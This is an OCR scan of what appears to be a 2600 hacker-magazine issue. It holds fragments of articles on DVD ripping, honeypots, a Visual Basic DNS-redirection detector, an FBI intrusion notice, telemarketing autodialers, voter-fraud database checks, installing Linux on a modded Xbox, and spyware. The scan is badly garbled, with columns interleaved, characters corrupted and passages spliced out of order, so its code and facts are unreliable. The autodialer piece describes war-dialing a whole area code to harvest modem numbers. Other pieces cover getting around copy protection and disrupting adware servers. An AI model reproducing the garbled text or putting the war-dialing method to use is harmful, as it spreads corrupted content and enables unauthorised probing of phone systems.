up asking you to select your preferred vide 
compression method. Choose your poison 
recommend DivX 5.0.2) and click OK, then si 
back for a few hours while it converts. If the fi 
is too large, find an AVI splitter out there. I^ 
heard AVIChop is good. 
6(VS): VCD and SVCDs need a few mo 
steps. Still in DVD2AVI, click file-]save p 
ject. Name the project and click "Save", It 
run through the movie file once or twice 
then beep when it finishes. This process 
take less than the ripping process, but it depends 
on your processor. Once it's done, write down 
the contents of the "Aspect Ratio" and "Video 
Type" boxes. We need that information for 
TMpgEnc. 
7: (From now on, all unlettered steps refer to 
VCD and SVCD only, since AVI users should 
have stopped reading this already.) Now We 
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by Maniac Dan 

Disclaimer: Copying DVDs to sell or DVDs 
you do not own is illegal and immoral and 
should not be done. 

After reading the letter in 19:3 questioning 
the methods of DVD copying, I decided to write 
an article detailing exactly how it's done, or at 
least get it close enough for normal people to 
make backups of their DVDs. I've only tested 
this on Region | NTSC DVDs. Readers in other 
countries should find a guide for their region 
and video format. Sorry. I also find it useful to 
bring a stack of VCDs with me on trips, since 
my laptop doesn't have DVD capabilities. Any- 
way, I'm going to detail the methods for ripping 
to either AVI, VCD, or SVCD. Some of the 
steps are the same, but for steps that are differ- 
ent, I will assign them both à number and a let- 
ter, so 3(A) is the AVI instructions, 3(V) is 
VCD, and 3(S) is SVCD. Any step that applies 
to all three formats will have no letters. In order 
to rip to AVI, you need Smartripper and 
DVD2AVI. To rip to VCD and SVCD, you need 
these files plus TMpgEnc and BBMpeg. Also, 
for the ripping process to work on XP or some 
versions of 2K, you need a valid aspi layer dri- 
ver. To burn your CDs you need software that 
supports VCD and SVCD burning, like Nero. 
(Links for these programs are the end of this ar- 
ticle.) Now for the steps: 

1: Insert the DVD and play it for a few sec- 
onds in a software DVD player. This will "un- 
lock" the DVD and allow you to rip it using 
Smartripper. 

2: Load up Smartripper and take a look 
around. At the bottom of the screen is a "Target" 
box which needs to be filled in with a valid 
folder name. The rest of the first page is chapter 
selection for if you only want to rip certain 
scenes (like Monty Python sketches). The sec- 
ond tab is called "Stream Processing" and al- 
lows you to select the languages and special 
tracks you want ripped. I usually just rip them 
all and then only convert the English track, but 
if you're hard pressed for drive space, then cut 
out what you don't want. Next, click the settings 
tab. Under settings, I recommend setting key- 
check to "Every VOB File" and filesplitting to 
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the 


] would not under normal circumstances en- 
Page in, It's going to be next to impossible for 


z - xy63r ninja to use an entrapment defense 


in court, because by the time po po shows up, it 
will be obvious he was lame-assing around of 
his own accord. However, if a crafty admin goes 
on IRC and tells everyone that his honeypot is 
actually the fabled government computer that 
holds the truth about the Kennedy assassination, 
Area 51, and ancient methods of dolphin flog- 
ging and people hack him, then an entrapment 
defense would stand a chance. The reason is 
that the admin could never prove that xy63r 
ninja and his crew were going to hack his sys- 
tem without being enticed. Other critics say that 
honeypots are akin to electronic wiretapping. 
This I can agree with. Since there is not much 
legal regulation of honeypot technology, and 
the closest legal procedures are loose at best, 
some very scary things could happen. 

Other companies could expand the basic 
thrust of the technology, perhaps into the p2p 
networks. At that point it would be us, the 
hacker community, that stands up and tells the 
world that this is a gross invasion of privacy. 
Then, pretty much just like the MPAA did to us, 
all they would conceivably have to say is: "Con- 
sider the source, your honor. Hackers want this 
technology stopped. Hackers are criminals. You 
don't want to side with criminals, do you? We 
are here to protect the American people from 
hackers, and we need you to be brave and give 
us the power to shut these nasty people down." 
Then in all likelihood, the corporations would 
roll right over us again. I don't think it takes a 
major leap of logic to see that this is where hon- 
eypot technology, or more specifically, technol- 
ogy that clearly violates people's rights under 
the guise of protection, could be headed. Also, I 
don't trust the "good guys" any farther than 1 
can throw them. We need to put a handle on the 
situation before the "security community" gets 
any ideas on how to further expand their powers 
past our rights on the backs of the hacker 
community they demonize to get their way. 

Why Honeypots Are 
Not Practical For Everyone 

The good news is that honeypots are not a 
true "solution." The best application for a hon- 
eypot is to track an intruder who has already 
made a home in the system. The most notewor- 
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| 
by Bland Inquisitor 
bland_inquisitor@h 


Honeypots are usually programs. ا‎ 


late services on a designated port, but once suc- 
cessfully cracked, offer no real power to the 
attacker. The honeypot program will then alert 
the admin that an attack is in progress, and will 
allow the admin to track the attacker's every 
move. Honeypots will also show the methods 
the attacker is using to gain entry, and what 
methods are being used to cover his or her 
tracks. In this article, I will show how honey- 
pots work, why honeypots are not generally 
practical for most security situations, and how 
honeypots are breeding both smarter attackers 
and dumber admins. 
How Honeypots Work 

Honeypots are designed to operate on many 
levels. They increase the time an attacker will 
spend because the honeypot makes it unclear 
which attacks work and which ones don't. They 
let the admin know what method an attacker is 
using before they succeed - such as port scan- 
ning, brute forcing a password, or a Sendmail 
attack. Once honeypots are widely imple- 
mented, the attacker will be forced to spend 
more time in a system that may be closely 
watched, and will eventually be scared off. 
Also, once xy63r ninja the script kiddie stops 
going anywhere near the system, admins can fo- 
cus all their attention on fending off people with 
actual skill. 

In one of the honeypot advertisements I 
read, port 365 was being used as the honeypot 
port. This means that a scan that returns port 
365 as active will make the would-be attacker 
turn and run off, and that systems that are not 
running the honeypot can use port 365 as a 
bluff, so that when xy36r ninja the script kiddie 
sees it and the system looks sexy, he will be less 
inclined to go in because he thinks that the vul- 
nerabilities he sees are a deception. According 
to SecTech systems administrator Dan Adams, 
honeypots are "like opening a fake store, load- 
ing it with cool stuff, and sitting back hoping 
someone will break into it.” 

Honeypots are catching a lot of pretty seri- 
ous heat from the legal and ethical community. 
Some critics are calling honeypots entrapment. 
Let me clear this up for you. Entrapment occurs 
when a person is coerced to commit a crime that 
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11(S): Playing SVDS needs a compatible Links 
DVD software player or an MPEG2 codec for http://www.afterdawn.com/software/video_soft- 
your Medial Player. Personally, I use ATI's me- — Ware/dvd rippers/smartripper.cfm 
dia center, or PowerDVD. http://www.afterdawn.com/software/video_soft- 
12: Enjoy! Props to KalEl - I learned how to W2"/dvd_rippers/dvd2avi.cfm —— 
rip DVDs using his site, Also, check out after- NPY Www.aflesdiwn.com/software/video soft 
dawn.com - there are some good things on etatis PRESS 


. g http;//members.cox.net/beyeler/bbmpeg.html 
there. I would also like to ask Wilson to read http://www.adaptec.com/worldwide/support/dri- 
this article aloud to the class like he always — verdetail.html?catz/Produc/ASPI- 
does. Thanks. 


4.70&filekey=aspi_v470.exe 


U.S. Department of Justice 


Federal Bureau of Investigation 


In Reply, Please Refer to 
File No. 


The NASA Office of Inspector General and the FBI are conducting a joint investigation 
into unauthorized computer intrusions that have affected both the government and private 
industry. During the course of this investigation, we discovered a log file listing Internet 
Protocol addresses and server names. It appears to be a list of computers that were 
compromised. 


In order to notify the potential victims of this criminal activity and enable them to check 
their own systems, we have compared the log of IP addresses and server names against the most 
recent information available in the WHOIS database. This letter is being sent to you because the 
IP address or server shown below, and last registered to you, appeared on the log file of apparent 


victims. 


We have no indication that the intrusions associated with this activity are continuing. We 
also are unaware of the hacker's methodology against your system, the potential level of access, 
or the possible damage to your system. The time frame of the activity to which the log file f 
relates occurred between December 2001 and March 2002, with the majority of the activity 
occurring in mid-February 2002. 


This communication is being provided to you by the Watch and Warning Unit of the 
National Infrastructure Protection Center (NIPC), located at FBI Headquarters in Washington, ۱ 
D.C. In addition to the recommendation that you check your log files for indications of unlawful. 
activity and take appropriate mitigation action, NASA and the FBI request that you provide any 
information relating to this matter to the NIPC by e-mailing the Watch at nipc.watch(Qfbi.gov. | 
For recommendations about examining your systems in a manner that helps preserve the 
evidentiary value of information you discover, please refer to the NIPC website at 
www .nipc.gov/incident/incident2.htm. 


System(s) Information 





The kicker of this is that both the contact and domains referenced had nothing to do 
with us and we were apparently sent this letter in error. Yet more wasted time and 
resources. (The Watch and Warning Unit?!) 
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if (splitit[2]2—" www.fuckgeneralmotors.com") [ 
document.write("<html><head><meta http-equiv="REFRESH' 
content='1;URL=http://www.2600.com'></head></html>"); 

} 

else ( 

document.write("<html><head><meta http-equiv=' REFRESH’ 
content='1;URL=http://www.ford.com'></head></htmi>"); 

} 

</script> 

</head> 

<html> 


OK, here is the DNS Redirection filter made in ۰ 

Note: If you are going to set this filter up you'll have to change your server port 0 Something 
other than 80 and change the meta headers to redirect to that port (big deal, unless you're running 
IIS). You could add this feature to an open source web server, too. You could alter the code to 
redirect to the port directly. 
Step 1. Create a project with "Standard EXE”. 
Step 2. Add a Winsock component and name it Winsock! (that's the default). 
Step 3. Change the properties of Winsock1's Index tab to 0. 
Step 4. Make a form and name it Form! (default again). 
Step 5. Put the code below in the form. 


'DNS Redirection filter 
‘by 0010 bOOt 
Tor Fored(lol) and NPR 


Private webaddress As String 
Private webip As String 
Private intlastcontrol As Long 


Private Sub Form Load() 

webaddress = LCase(Winsock(0).LocalHostName) 
webip = Winsock 1(0).LocalIP 

intlastcontrol = 0 

With Winsock 1 (0) 

.LocalPort = 80 

.Listen 

End With 

End Sub 


Private Sub Winsockl ConnectionRequest(Index As Integer, By Val requestid As Long) 
If Index = 0 Then 
intlastcontrol = intlastcontrol + 1 
Load Winsock 1 (intlastcontrol) 
Winsock 1 (intlastcontrol).LocalPort = 0 
Winsock | (intlastcontrol).Accept requestid 
End If 
End Sub 


Private Sub Winsock 1_DataArrival(Index As Integer, By Val bytesTotal As Long) 
Dim datal As String 

Winsock 1 (intlastcontrol).GetData data1 

On Error GoTo redirectnormal 

al = InStr(1, datal, "Host: ") + 6 

a2 = InStr(al, datal, vbCrLf) 

a3 = LCase(Mid(datal, al, a2 - al)) 

If a3 = webaddress Or a3 = webip Then 
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Most admins are only slightly better than goo 
ole xy63r ninja in the first place - they get ti 
latest and greatest piece of ready-made softy 
and call themselves experts. What is bound ۷ 
happen in the majority of the situations is that. 
company sets up a honeypot and never ers 
to spend the time it takes to maximize its effec- 
tiveness. Of course, the true answer is for ad- 
mins and software programmers to actually tak 
a little pride in their work and do their jobs 
properly. Also, it would help if software 1 
nies would take some responsibility when they 
find security holes in their product and f 
accordingly. System admins should also feel 
obligated to keep their software current, and 
make sure nobody within their company is 
given more access than they need. 

Shout outs: stankdawg, grifter, debug, pro: 
ject honeynet. And an apology if anybody actu- 
ally uses the name xy63r ninja. 






DNS Redirection S t o pped 


by 6014 b00t 
The letter from "bradsnet" in 19:3 about how Ford could redirect back to 2600.com or 127.0.0.1 
etc. got me thinking about how easy that could be. It turned out to be easier than I thought. Ever 
http request has a host field in it that contains the address that was typed in, so if I type it 
www.2600.com and click "Go" it will have www.2600.com in the host field. 


thy case of this happening was documented by 
Clifford Stoll in his book The Cuckoo's Egg. 
Stoll was an admin at Berkeley when he found 
an intruder using his system to steal secrets. But 
only an admin who has been around the block a 
few times and watches his system often can 
make full use of honeypots. Apart from that, 
over 90 percent of attacks against a system 
come from inside, and there is nothing a honey- 
pot can do to stop someone who has internal ac- 
cess from running amok. For the average 
company, the extent of a honeypot's effective- 
ness is to keep xy63r ninja and the rest of the 
script kiddies away, and to show that there is a 
real threat of people breaking into the system. It 
is almost unheard of that a honeypot traps 
someone with real skill because it is designed to 
keep the kiddies at bay. 

In the digital arms race, tightening the exist- 
ing security holes will only force the attackers 
to get better while the admins get complacent. 


All browsers that I know of send the host field in their http request. If DNS redirects a site, the 





host field will not change when redirected and so we can detect it with little effort. 


Example of a HTTP request (notice the host field): 


GET / HTTP/1.1 

Accept: */* 

Accept-Language: en-us 
Accept-Encoding: gzip, deflate 


User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 


Host: www.2600.com 
Connection: Keep-Alive 
<crif><erlf> 


Included is a small VB program (I used VB to show how easy it is) that scans all incoming http. 





requests and checks to see if the host field is the web address or the IP address of the current web- 
site. If not, it redirects to 2600.com, and if so it redirects to Ford's website. This doesn't protect from 
meta tag redirection, or (I)FRAME redirection which needs a webpage to do the redirecting, rather 
than a DNS entry. Here is a script that can stop that (real simple - it took five minutes!). Hey, a 16 
year old can do it, so can a big corp. 


«html» 

<head> 

<script> 
splitit=document.referrer.split("/") 
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their "do not call" list. The DMA also allows 
one to register their mailing address as well as 
email address as opt-outs to cut down on junk 
mail and, allegedly, spam email. Not all com- 
panies check their sample against the DMA's 
opt-out list, and not all maintain a "do not call" 
list, but any company that wishes to do busi- 
ness in an above-the-board manner will heed 
your request. Telemarketing companies can be 
somewhat sketchier than market research com- 
panies - any market research company that 
wants to stay in business and make money will 
follow the guidelines for standards and ethics 
set forth by the MRA (Marketing Research As- 
sociation), CASRO (Council of American Sur- 
vey Research Organizations), and other 
organizations. A client will likely not do busi- 
ness with a market research company that does 
not belong to these organizations. 

It does take a while for your opted-out 
phone number/address/email address to trickle 
down and through the gigantic system that is 
comprised of sample houses (those that pro- 
vide the phone numbers, street addresses, and 
e-mail addresses), and to the thousands of end- 
users (telemarketers and research companies), 
but it does work. A perfect time to do this is 
when moving and getting a new phone num- 
ber, but it will have an eventual effect if you're 
staying put as well. 

Another option is to sign up for your local 
telco's "security screening" plan, if available. 
This will require any caller who is blocking 
their Caller ID info to input their phone num- 
ber, or the call will not be connected. One 
drawback is that some long distance compa- 
nies relay calls around the country to the clos- 
est low-traffic switching point and the Caller 
ID info is stripped in the process, requiring 
Grandma to input her phone number each time 
she tries to call you, since she's on a fixed in- 
come and using Jimbo's Phone. Company to 
make cheap long distance calls. 

No one will ever be totally free from re- 
ceiving unwanted phone calls, but there are 
ways to dramatically reduce them. As many 
ways that there are of keeping our phone num- 
bers in the hands of those we want calling us, 
there are ways of getting around whatever we 
put in place to try to ensure this. Surely some- 
what ironic to those reading this magazine... 
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can distinguish between non-working numbers 
(those that answer with the familiar tri-tone 
followed by a recording of some sort), those 
that do not ring at all, those that are busy, those 
that are good (no answer, etc.), and those that 
are fax/modem/machine numbers. Each phone 
number has a status code assigned to it and any 
bad numbers are resolved never to be called 
again. 

Aside: Interesting point here is that all the 
fax/modem/machine numbers will have re- 
ceived a unique status code marking them as 
such - basically there now exists a pool of 
phone numbers that have a very high likeli- 
hood of being modem numbers. Just as easy 
would be to set up a project that runs automat- 
ically overnight, dialing strictly 202-xxx-xxxx 
numbers (if you wanted to find machine num- 
bers in the DC area), and have your CATI soft- 
ware just hang up on all good numbers. Look 
at your "bad: modem number" list in the morn- 
ing and you've got an excellent start on your 
fun for the days to come. If one has the desire, 
and access to a larger System, one could easily 
burn through tens of thousands of phone 
numbers in a single night. 

But back to the TeleZapper vs. auto-dialers 
and other devices. For them to work, your 
phone must actually go off hook and transmit 
the tone(s). If an auto-dialer calls your number 
and your voice mail picks up, the call is imme- 
diately transferred to an available agent, who 
will mark your phone number as known good, 
but you're not home (answering machine/voice 
mail answered). I'm sure you're already ahead 
of me here, but, the obvious step to take is to 
record the "bad number" tone(s) as the first 
part of your outgoing message. Sure, it will an- 
noy the hell out of your friends and family, but 
it will kill your phone number in that sample 
pool if it's being dialed by an intuitive 
auto-dialer. 

Note that I say that sample pool. Your 
phone number may exist in myriad sample 
pools at different companies. One way to dra- 
matically cut down on telemarketing calls (and 
market research calls, if you're so inclined, 
though they are two very different entities with 
two very different agendas), is to first register 
the phone number with the DMA (Direct Mar- 
keting Association) as wanting to opt-out of 
telemarketing calls. Also, explain to any com- 
pany you do not wish to hear from that you 
wish for your phone number to be placed on 
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GoTo redirectnormal 
Else 


'DNS redirection detected redirecting back to 2600.com 
Winsock | (intlastcontrol).SendData "<html><head><meta http-equiv=" + Chr(34) + "REFRESH" 
+ Chr(34) + " content=" + Chr(34) + "1;URL=http://www.2600.com" + Chr(34) + 


"></head></html>" 'meta tags here 
End If 
Exit Sub 
‘here we do a normal redirection to ford.com 
redirectnormal: 


Winsock | (intlastcontrol).SendData "<html><head><meta http-equiv=" + Chr(34) + "REFRESH" 
+Chr(34) + ۲ content=" + Chr(34) + "1;URL=http://www.ford.com:80” + Chr(34) + 


"></head></html>" 'meta tags here 
End Sub 


Private Sub Winsockl SendComplete(Index As Integer) 


Winsock  (intlastcontrol).Close 
End Sub 


Step 6: Compile and run. 


Shoutouts: Hi Mom, Bryan, Cassidy, my bro (Nathaniel), and whoever I forgot. 


More on 





Telenarket i tic 


valid area codes and exchanges, minus already 
known phone numbers - basically war dialing 
for unlisted phone numbers. 

If you ever get a phone call that shows up 
on your Caller ID as being from, say, XYZ Re- 
search, and it hangs up immediately after you 
answer, you've received a "nuisance call." This 
happens when the autodialer has made more 
calls than there are available humans to patch 
you to, Your phone number is now flagged and 
will receive special treatment - the system 
knows you are home and answering the phone, 
but it also knows it just hung up on you. You 
will now get another call from XYZ Research 
in about 15 minutes (the amount of time lapsed 
is set by the user system-wide), but this time 
their system will reserve a human before call- 
ing you, ensuring that they get to talk to you. 

The autodialing system will eventually 
have dialed through the entire pool of samples 
and it will have pretty much determined which 
phone numbers are good and which are not. It 
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by D. Foetus 

In response to the number of letters re- 
ceived regarding the TeleZapper and similar 
systems that will "zap" your phone number 
from a telemarketing system's database, here is 
some more insight. 

Many larger telemarketing, market re- 
search, and bill collection companies use auto- 
dialers coupled with CATI (Computer Aided 
Telephone Interviewing) software systems. 

It is the job of the autodialer to dial, say, ten 
phone numbers for every human agent that is 
currently seated in their calling center, know- 
ing that one out of every ten phone calls will be 
answered, The number of calls made by the 
auto-dialer can be, and usually is, automati- 
cally adjusted depending on how that 10:1 ra- 
tio performs. For example, if the sample being 
dialed consists of phone numbers culled from 
product registration cards, the number of an- 
swered calls may be higher than if the machine 
is running RDD (Random Digit Dialing) in 
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If you managed to get a copy of the landlord 
listings, be sure to check all those names thor- 
oughly as well. A common form of voter fraud is 
for landlords to register at a property they are rent- 
ing out. A good portion of our leads were also gen- 
erated this way by checking landlords we knew 
had broken the rent-control laws. 

The last method we used that had results was to 
start running names of business owners who oper- 
ated in town. Much like the landlords, some un- 
scrupulous business owners will register to vote at 
their place of business. 

Well, that's basically it in a nutshell. Hopefully, 
this short article was informative and useful, as 
well as a contribution showing that 2600 readers 
are often more concerned about protecting and 
maintaining the democratic process than the politi- 
cians who scapegoat us as evil hackers. For ques- 
tions or comments, email dominick@ramiustech 
.com with "2600" in the subject line. 







or just for the challenge of it. The Xbox is no 
exception. It is now possible to put a full Linux 
distribution on the Xbox console, due to the 
work of some very diligent Linux/Xbox hack- 
ers. I will cover the steps to go about installing 


Linux on your Xbox console and the 
significance of such an installation. 

There are multiple reasons one might want 
to go about installing Linux on an Xbox. For 
one, it would serve as a very inexpensive desk- 
top computer. Being that you can now find 
Xboxes selling at prices of $170-$200, this is 
understandably worthwhile. The Xbox is also 


pretty well, because how effective your work here 
will be will be in direct proportion to how well you 
know your town. The first test is to query all non- 
city resident employees and run their names on 
both the Active Voter Registration and Actual 
Voter databases. Note down any instances, but 
keep in mind that the individual may have lived in 
your town at one time, and showing up on the Ac- 
tive Registration Database isn't a crime in and of 
itself - voting (i.e., being on the Actual Voter Data- 
base) is. Follow this up by running a query with all 
employees making over, say, $65,000 a year. Run 
their names on both the voter databases and pay at- 
tention to what their registration address is. You 
may discover some rather well-off individuals liv- 
ing in really shady neighborhoods. In our investi- 
gation, we caught the city's Chief of Operations for 
Urban Renewal voting out of the same run-down 
apartment in an impoverished high-crime area as a 
small immigrant family. On investigation of the 
Property Tax Records, we discovered he lived in a 
nice home a few towns away! Most of our results 
came from this method. 


inux 
On Ihe 
xBO 


by Live_wire 

Requirements: 
- A mod-chip. 
- Ed's xbox linux (Debian derative) found at: 
http://sourceforge.net/project/showfiles.php?gr 
oup_id=54192. 

BIOS for mod-chip that allows Xbox to run 
unsigned code. 

EvolutionX dashboard, 

As some might have noticed, there has been 
several strides made in the attempt to put Linux 
on any device in which it would be logically 
beneficial to the computer/hacker community, 
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Cracking VOTER Fraud 


The second stop is your local Municipal 4 


TOi am 


ie; 


Clerk's office. Here you request a listing of all paid 
city employees ("Municipal Employee List"), 
specifying the following information: salary, 
whether or not he or she is a city resident, years of 
service, job title, and of course name. They must 
release this information to any city resident as it is 
considered public information (your tax money 
pays their salary). Again, they may charge you for 
costs. In our instance, the City Clerk's office tried 
throwing us off by refusing to provide us with a 
CD-ROM version, and instead provided us with a 
printout of the database. Luckily, volunteers cre- 
ated an Access database and entered the informa- 
tion into it within a day or so. You may also request 
a listing of all rental properties (and landlord own- 
ers) from your city's Rent-Leveling Board or 
similar body. 

OK, so now you have your base documents, 
You've gathered your information. Now to poke 
for weaknesses. What next? Well, first look at the 
Active Voter Registration and sort it by birthday, 
Any 172 year olds still registered? Probably not. If 
so, check their names on the Actual Voter Data- 
base. In our investigation, we immediately noticed. 
an enormous number of people born om 
01/01/1901. According to the Board of Elections, 
this is their standard procedure for dealing with il- 
legible entries and/or people who registered to 
vote before New Jersey required birthdate to be 
added to the Voter Registration form. Sorry, strike 
two. Next, run a query to isolate everyone from 
like age 99 and up. If you feel there's an overabun- 
dance, check the names against the Social Security 
Death Index on http://www.ancestry.com. Don't 
get too excited if you find matches though - Amer- 
icans have the funny habit of naming their kids af- 
ter themselves. Go to http://www.netronline 
.com/public_records.htm (Property Tax Records) 
and make sure it isn't their son or grandson (in one 
instance we originally thought for sure was voter 
fraud, there was a son named after his father, who 
inherited the house his parents had lived in, and 
then married a woman with the same first name as 
his mother - creepy!). Be thorough, but don't waste 
too much time on this - we had a team spend over 
a month on this and turn up only a handful of "pos- 
sibles." It might also be helpful to have someone 
working with you who has access to credit cand 
histories/databases, but I'm not sure if that is legal 
or how useful it would be in this instance. 

That takes care of the infamous "dead vote." 
The next "weakness" to probe is the Municipal 
Employee List. Hopefully, you know your town 
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by Kr@kH3d (DFxC) 
(Why the goofy "leet" name? Overkill is funny...) 

Some New York 2600 readers may have seen 
the recent three minute report on WABC's Eyewit- 
ness News (10/25/02) on the discovery of sus- 
pected fraudulent voters in New Brunswick, NJ. 
Since I've been a longtime 2600 fan and played a 
major part in the investigation, I figured I'd outline 
how we did it, After speaking with the people at 
the local Board of Elections and realizing how 
easy it is to commit voter fraud, I also felt it may 
be of use to others in general. Oh, and if you saw 
the report, there's a brief shot of my back while I'm 
at the computer wearing an H2K shirt! 

The technique outlined here was developed by 
the New Brunswick United (http://www.new- 
brunswickunited.com) Antifraud Division, headed 
by attorney Flavio L. Komuves. I was lead investi- 
gator in charge of isolating possible cases of voter 
fraud, and was ably assisted by a number of Rut- 
gers University student interns. 

I should preface this with the disclaimer that 
the resources and procedures I am outlining are 
legally available in New Jersey, and there is no 
need to obtain any information illegally. Check 
with your local authorities for your area. Also, a 
new law regarding voting was recently signed and 
certain new provisions will take effect in the 2006 
elections. Always take any information you gather 
to a reputable lawyer and get advice before releas- 
ing it publicly - voter fraud is a serious charge and 
falsely accusing someone (even unintentionally) 
could probably result in charges against you! Also 
keep in mind, any information we determined via 
this method of database searching was later veri- 
fied by actual field visits to the properties in ques- 
tion. 

It's actually rather similar to profiling a system. 
The first step is to gather all the information possi- 
ble about your target. Your first stop should be 
your county Board of Elections. You will have to 
fill out certain forms - being part of a political or- 
ganization helps out here, as they reserve the right 
to ask why you are requesting the information. 
There are two databases they maintain that you 
will need to request on CD-ROM: the current Ac- 
tive Voter Registration database ("walking list") 
and the current Actual Voter Database ("voting his- 
tory"). There will probably be a fee involved - ex- 
cessive fees for preparation and other "costs" is yet 
another way the government restricts your access 
to information (while insisting on greater access to 
your information). I believe it should come to ap- 
proximately $60 for both CD-ROMs and it may 
take a week or so for them to prepare. 
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4. Hack a way to circumvent the spyware or 
adware software and most importantly post these 
to a hacker message board or to a hacking 
website. 

5. Avoid adware. If you're broke and can't buy 
à clean shareware product, find an ad-free, non- 
spying equivalent of the program you need. This 
can be hard since many popular programs come 
only with adware installed. 

6. Learn to use a packetsniffer to identify 
transmissions that sneak through your browser 
and other trusted apps. 

7. Get to know your registry really well espe- 
cially the HKEY LOCAL MACHINENSOFT- 
WARE,  HKEY CURRENT USERVSoftware, 
and for Win2k HKEY USERSY areas. If you no- 
tice software installed that you are suspicious of, 
check to make sure it's not spy ware or adware. 

8. Manage your startup programs carefully. 
Check the registry or use "msconfig" or a similar 
startup manager or alternatively download and in- 
stall a free task manager to check and kill running 
spyware/adware. 

9. And finally, you can also reverse engineer 
the adware software and find a way to corrupt the 
data being transmitted. Alternatively develop 
your own program to transmit dummy data to the 
adware/spyware host servers. If you do achieve 
this, post the results to a hacker message board or 
to a hacking website. 

Some good ad removal programs are: Opt-out 
(grc.com/optout.htm) and Ad-Aware (lavasoft- 
usa.com). Also, visit the following websites: 
scumware.com, security.kolla.de, and spyware- 
info.com. 

In summary, spyware and adware are not ille- 
gal types of software in any way. However there 
is almost no way for the user to actually control 
what data is being sent. My guess is that a deliv- 
ery system like the ones used by spyware and ad- 
ware corporations would be the most efficient 
way for governments to spy on the public. They 
probably have already thought of using this sys- 
tem so hackers beware. 

Shouts to VISA_burglar>>Greg_Ipp, 
Jalaludin Rumi, _SIR_B_U_D_, Scrappy. 
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by 0/4V3_3y3d_M\0NVst3r 
haxor2600@ mailcity.com 

This short article is far too small to encompass 
this topic but hopefully it will focus more atten- 
tion on the increasing problems of removing spy- 
ware and adware. Any hacker running a Windows 
operating system is going to come across some 
spyware or adware at some point. Popular file 
sharing P2P software are typically one of the 
most common areas where adware is installed. 
An example of this would be Kazaa P2P, which 
by default installs cydoor (cydoor.com). 

Spyware and adware are often hidden deep in 
the Software Licensing documents and Terms 
And Conditions when you install the software. 
This can result in such things as your day-to-day 
activities being broadcast to strangers or annoy- 
ing ads being projected in your face every few 
minutes. 

To make it more confusing adware isn't neces- 
sarily spyware. Registered shareware without ads 
may be spyware, and purchased out-of-the-box 
software may contain adware and may also be 
spyware. In addition, software updates may 
change a previously ad-free version into an ad- 
ware product. All this means that users need to be 
on guard when installing any type of software. 

While legitimate adware companies will dis- 
close the nature of data that is collected and trans- 
mitted in their privacy statement, there is almost 
no way for the user to actually control what data 
is being sent. The fact is that the technology is in 
theory capable of sending much more than just 
banner statistics - and this is why people (espe- 
cially computer hackers) should feel uncomfort- 
able with the idea, 

To top it off, if you have a slow computer or 
Internet connection the resource-hogging adware 
or spyware can cause system and browser insta- 
bility and slowness, as well as slow Internet 
connectivity even more. 

How Do You Protect Yourself? 

1. Read the terms and conditions of the license 
carefully before pressing "accept." 

2. Run a spyware or adware removal software 
tool. There are many free versions available. 

3. Avoid spyware at all costs. Run a firewall 
utility like Zone Alarm (zonelabs.com) that spec- 
ifies which programs can access the Internet and 
how. Pay attention to what is asking for permis- 
sion to connect online. 
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You will then need to open your Xbox 
physically install the mod-chip. After that, y 
will want to install the EvolutionX das 
that you downloaded and burned to CD. 
will now have a pretty new interface that 
many features, such as backing up games ( 
you bought) and whatnot. Once this is in: 
you will then be able to install your downl 
Linux distro. Í 

You might be thinking, how do I work with 
Linux when all I have is an Xbox controller? 
Well, as you might know, the controller ports on 
the Xbox console are really just usb ports, with 
a little modification, You can get ahold of an 
Xbox controller extension, cut it in half leaving 
the end that plugs into the Xbox intact, and look 
at the wires. You will see a red, green, blue, 
white, and yellow wire, the same as a standard 
usb cable minus the yellow one. You can then 
cut a usb cable, leaving the usb A end intact 
which connects to your usb keyboard/mouse. 
Solder the matching wires together and leave 
the yellow. Xbox wire by itself. Do this two 
times and you now have a keyboard and mouse 
that you can plug into the Xbox and use with 
Linux, assuming Linux supports the ones you 
chose (make sure it does). 

There you have it. A Linux/Xbox that can 
now be used as you wish it to be, and the best 
part about it is that it is legal. The developers 
that have been working hard on this Linux pro- M 
ject are not building this software on top of the 
Microsoft kernel - they are using the Linux ker- 
nel. They are also not using non-licensed soft- 
ware like the XDK, which is Microsoft's 
development kit for the Xbox. The reverse engi- 
neering that has been done has been done under 
Section 1201 (f) Reverse Engineering Excep- 
tion for interoperability of the DMCA. 

I am indebted to the Linux developers of 
xbox-linux.sourceforge.net, the Xodus team, 
Xboxhacker.net (and its forum), Andy Green, 
and several other sites/individuals/hackers that 
have made this article possible. I will cover the 
more technical aspects of Xbox hacking in a fu- 
ture article, but I hope I have given enough in- 
formation so that you might get a start with 
hacking Linux onto the Xbox, and learn in the 
process. 
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feature-rich. It is a gaming console, DVD 
player, and now with the inclusion of Linux, can 
be your desktop computer, DivX player, and 
web/ftp server. Perhaps you would use it just to 
Tun nominal functions, saving your main com- 
puter the stress. This is just the beginning, 
though. The possibilities are, obviously, 
limitless, 

This brings us to the actual installation. You 
will need a modified Xbox to consider such a 
setup. However, this is not as scary as it may 
sound to those who might not have soldering 
experience. Gone are the days in which you 
would have to solder 29 wires to the Xbox 
motherboard, You can now buy wireless mod- 
chips which require no soldering at all. There is 
a chip out now called the Matrix (by Xodus) 
that is wire free and can be installed in a matter 
of minutes. There are also other chips in devel- 
opment that will be wireless also, so then it 
would be just a matter of personal preference as 
to which you would choose. I have chosen to go 
with the Matrix chip because it has no wires to 
solder, comes with a programmer, and, as far as 
I have seen, is the easiest to install. I must men- 
tion also, if you don't want to fork out $60, you 
can make your own. CheapLPC, designed by 
Andy Green, can be constructed for a few 
bucks. Visit _http://warmcat.com/milksop/in- 
dex.html. 

So this is where we start. You have your 
mod-chip of choice. You also downloaded the 
so image of the Xbox Linux distribution lo- 
cated at the sourceforge site mentioned at the 
beginning of the article. You will need to flash 
your mod chip with a BIOS that will support 
running unsigned code on the Xbox. These 
BIOSes can be readily found on the Internet 
with a little due diligence. I mentioned that the 
Matrix mod-chip comes with a programmer, 
You can plug that programmer into the parallel 
port on your computer and flash the Matrix with 
BIOS software that way. You can get the flash- 
ing software from http://warmcat.com/milk- 
sop/index.html (Xodus will release their own 
GNU software shortly). I have chosen to go 
with the EvolutionX 2.5 BIOS because it sup- 
ports all the features one would want, such as 
running unsigned code, among others. Next, 
you will have to download the EvolutionX 
dashboard, which will replace the original Xbox 
dashboard, and will act as your new interface 
with the Xbox and burn it to a CD-RW (Xboxes 
do not like CD-Rs). This can also be found on 
the net with a little patience. 


———————————— — — 
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Objects recognized as acceptable coins, using the 
sensor data, are diverted by a controllable deflect- 
ing door, to tubes for delivery to acceptable coin 
bins." 

Prior to entering the actual sorting mechanism, 
